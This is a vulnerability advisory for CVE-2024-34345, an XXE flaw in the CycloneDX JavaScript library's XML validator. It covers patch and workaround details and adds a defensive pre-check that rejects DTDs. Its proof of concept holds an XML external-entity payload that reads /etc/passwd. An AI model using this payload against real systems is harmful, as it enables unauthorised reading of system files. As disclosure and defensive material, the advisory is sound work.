CVE-2024-34345
@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability
Description

### Impact

XML external entity (XXE) injection could be possible when running the provided XML validator on arbitrary input.

#### POC

```js
const { Spec: { Version }, Validation: { XmlValidator } } = require('@cyclonedx/cyclonedx-library');

const version = Version.v1dot5;
const validator = new XmlValidator(version);

const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components>
    <component type="library">
      <name>testing</name>
      <version>1.337</version>
      <licenses>
        <license>
          <id>&xxe;</id><!-- << XML external entity (XXE) injection -->
        </license>
      </licenses>
    </component>
  </components>
</bom>`;

// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve => {
  console.error('validation error', ve);
});
```

### Patches

This issue was fixed in `@cyclonedx/[email protected]`.

### Workarounds

Do not run the provided XML validator on untrusted inputs.

### References

* issue was introduced via <https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063>.
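As an added, defensive illustration of the workaround above (this is example code, not code from the advisory or from the CycloneDX library): a pre-check that refuses any document carrying a DOCTYPE or ENTITY declaration, or a reference to a named entity other than the five predefined ones, before the document is handed to a DTD-aware validator. The function names (`findXxeIndicators`, `isSafeToValidate`, `guardedValidate`) and both sample BOM documents are constructed for this example; the guard takes the real validator as a callback, so it assumes nothing about the library's API, and the `SYSTEM` target in the malicious sample is a placeholder rather than the PoC's path.

```javascript
'use strict';

// The five entities every XML processor predefines; referencing them is harmless.
const PREDEFINED_ENTITIES = new Set(['lt', 'gt', 'amp', 'apos', 'quot']);

/**
 * Conservative pre-check for untrusted XML. Returns the reasons (if any) the
 * document should be refused before a DTD-aware parser or validator sees it.
 * Any DOCTYPE is rejected outright, internal or external DTD alike, as is any
 * reference to a named entity other than the predefined five. False positives
 * (e.g. "<!DOCTYPE" inside a comment) are accepted in exchange for simplicity.
 */
function findXxeIndicators(xml) {
  const reasons = [];
  if (/<!DOCTYPE/i.test(xml)) reasons.push('DOCTYPE declaration present');
  if (/<!ENTITY/i.test(xml)) reasons.push('ENTITY declaration present');

  // Comments and CDATA sections never expand entities, so ignore references there.
  const stripped = xml
    .replace(/<!--[\s\S]*?-->/g, '')
    .replace(/<!\[CDATA\[[\s\S]*?\]\]>/g, '');

  // Named references such as &xxe; (numeric references &#...; start with '#' and are not matched).
  const refPattern = /&([A-Za-z_:][\w.:-]*);/g;
  let match;
  while ((match = refPattern.exec(stripped)) !== null) {
    if (!PREDEFINED_ENTITIES.has(match[1])) {
      reasons.push(`reference to custom entity &${match[1]};`);
    }
  }
  return reasons;
}

function isSafeToValidate(xml) {
  return findXxeIndicators(xml).length === 0;
}

/**
 * Gate any validator behind the pre-check. `validateFn` is whatever does the
 * real work (for instance a bound `validator.validate` from the library; this
 * example makes no assumption about its signature beyond taking the XML text).
 * It is only invoked when the input carries no DTD or custom entity reference.
 */
async function guardedValidate(xml, validateFn) {
  const reasons = findXxeIndicators(xml);
  if (reasons.length > 0) {
    return { accepted: false, reasons };
  }
  return { accepted: true, result: await validateFn(xml) };
}

// Constructed sample: same shape as the advisory's PoC, with a placeholder SYSTEM target.
const MALICIOUS_BOM = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [ <!ENTITY xxe SYSTEM "file:///placeholder-path"> ]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components>
    <component type="library">
      <name>testing</name>
      <version>1.337</version>
      <licenses><license><id>&xxe;</id></license></licenses>
    </component>
  </components>
</bom>`;

// Constructed sample: a benign BOM using only a predefined entity (&amp;) and a comment.
const BENIGN_BOM = `<?xml version="1.0" encoding="UTF-8"?>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <!-- comments may mention &anything; without expanding it -->
  <components>
    <component type="library">
      <name>left &amp; right</name>
      <version>1.0.0</version>
      <licenses><license><id>MIT</id></license></licenses>
    </component>
  </components>
</bom>`;

// Stand-alone demonstration: report the verdict for each constructed sample.
for (const [label, doc] of [['malicious', MALICIOUS_BOM], ['benign', BENIGN_BOM]]) {
  console.log(label, isSafeToValidate(doc) ? 'OK to validate' : findXxeIndicators(doc));
}
```

The check is deliberately blunt: a CycloneDX BOM has no legitimate need for a DTD, so refusing every DOCTYPE costs nothing and closes both the external-entity and the entity-expansion ("billion laughs") cases at once. If the validator in use can be configured to disable DTD processing, that setting should be applied as well rather than relying on a textual pre-filter alone.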
How to fix CVE-2024-34345
To fix CVE-2024-34345, upgrade the affected package to the patched version listed below.
- Upgrade to 6.7.1 or later
Is CVE-2024-34345 being exploited?
Low: the EPSS score is 0.1%, and no large-scale exploitation activity has been observed so far.
Affected packages (1)
- >= 6.7.0, < 6.7.1